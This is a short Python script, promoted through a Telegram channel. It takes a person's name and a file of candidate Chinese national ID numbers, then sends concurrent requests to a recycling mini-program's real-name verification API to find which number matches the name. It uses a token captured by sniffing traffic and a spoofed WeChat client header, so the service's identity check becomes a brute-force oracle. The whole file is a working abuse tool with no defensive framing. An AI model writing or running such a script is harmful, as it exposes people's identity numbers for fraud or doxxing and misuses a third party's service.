import requests
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
#小程序京大大回收 频道https://t.me/cmingapi
#小程序京大大回收 频道https://t.me/cmingapi
#小程序京大大回收 频道https://t.me/cmingapi
#token需自己抓

# 读取身份证号
with open('6.txt', 'r') as file:
    id_numbers = file.readlines()

# 去除每行末尾的换行符
id_numbers = [id_number.strip() for id_number in id_numbers]

# 用户输入姓名
name = input("请输入姓名: ")

# 请求的URL
url = "https://www.jingxi-wl.com/api/user/primaryCertification"

# 定义核验函数
def verify_id(id_number):
    # 构造请求体
    payload = {
        "name": name,
        "id_card": id_number,
        "returndatetype": "JSON"
    }

    # 设置请求头
    headers = {
        "token": "小程序京大大回收抓包登录获取",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.49(0x18003137) NetType/WIFI Language/zh_CN",
        "Referer": "https://servicewechat.com/wxc3101481596a072a/12/page-frame.html"
    }

    # 发送请求
    response = requests.post(url, data=payload, headers=headers)

    # 处理响应
    if response.status_code == 200:
        response_data = response.json()
        if response_data.get("status") == -1 and "已初级认证!" in response_data.get("info"):
            return f"身份证号: {id_number} - 核验成功✅"
        elif response_data.get("status") == -1 and "身份证号与真实姓名不符" in response_data.get("info"):
            return f"身份证号: {id_number} - 核验失败❌: {response_data.get('info')}"
        else:
            return f"身份证号: {id_number} - 核验成功✅"
    else:
        return f"身份证号: {id_number} - 请求失败,状态码: {response.status_code}"

# 使用线程池进行并发请求
with ThreadPoolExecutor(max_workers=5) as executor:
    futures = {executor.submit(verify_id, id_number): id_number for id_number in id_numbers}
    for future in as_completed(futures):
        result = future.result()
        print(result)

print("核验完成。")